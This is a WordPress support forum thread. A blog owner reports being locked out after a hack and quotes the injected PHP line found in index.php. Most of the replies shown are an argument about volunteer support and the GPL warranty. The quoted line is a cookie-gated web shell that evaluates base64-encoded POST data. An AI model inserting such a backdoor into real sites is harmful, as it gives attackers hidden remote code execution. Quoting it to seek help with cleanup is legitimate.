Login Hacked – Security Issue 2.6

  • Our blog has been hacked and we are unable to login. When you try login you get looped back to the login page with no explanation/error message. The Blog is up and running and I can’t see any issues (yet..).
    There were 2 files that were changed index.php and xmlrpc.php and I found this line added to the index file:
    <?php if(md5($_COOKIE['f711587cbed7bdca'])=="1452a323f11b0dd60c49b49f004f077c"){ eval(base64_decode($_POST['file'])); exit; } ?>

    Looking for help…
    Thank you.

Viewing 5 replies - 16 through 20 (of 20 total)

  • mean, honestly, WTF are you expecting us to say?

    Gee I don’t know, not this? Considering it is a support forum something helpful would be nice.. I generally expect a mod to represent their team well, and your doing nothing to help come to a solution.

    Ever think of telling someone what information to provide to help solve the problem if they have not?

    You’ve done nothing at all except complain.

    No, bud, re-read his posts. He asked for help to a problem. Complaining would be what I’m doing to you. You work in customer service, that is part of “support”. And telling someone to go find another platform is 100% opposite of what you need to be doing.

    but that is the point — HE DOESN’T WORK IN CUSTOMER SUPPORT.

    there IS no customer support here.

    You work in customer service, that is part of “support”.

    Definition of “customer”: someone who pays for goods or services
    wordnet.princeton.edu/perl/webwn

    Otto is voluntarily offering his support to this forum. The support you are making reference to is to someone who’s actually PAID for their product. There’s a big difference between “work” and volunteer”. You should be grateful that Otto’s even replying to these issues.

    Someone who DEMANDS support when they has done nothing to earn it, is just plain incoherent.

    Read the GPL please:

    BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

    I’ll join the pileon, before this is locked.

    Ever think of telling someone what information to provide to help solve the problem if they have not?

    Its nice to think that one can be prodded to answer questions. Thats not the way it goes in the real world though, and especially not on the web.

    Why not?

    Because there are people that know what info to provide, and if they dont, they at least try. Those people, far and away, get more ‘attention’ because they tend to be easier to help.

    Consider that as volunteers, we get to pick and choose what we respond to. Why am I, or anyone else, going to pull teeth in one thread, when we can help 10 others in the same amount of time??

    And, well, to be honest, it’s not our job to pry answers put of anyone. In the case of the person above with 15 blogs, someone like myself would be inclined to think that he/she ought to already know what info to provide. And, if not, than perhaps he/she ought to get a new hobby/job.

    A good first step before asking for help here is a forum search for keywords describing your problem or for unique words in your code or error message. Of course, it takes a little effort to wade through the threads, but then you don’t have to wait around hoping that someone will answer.

Viewing 5 replies - 16 through 20 (of 20 total)
  • The topic ‘Login Hacked – Security Issue 2.6’ is closed to new replies.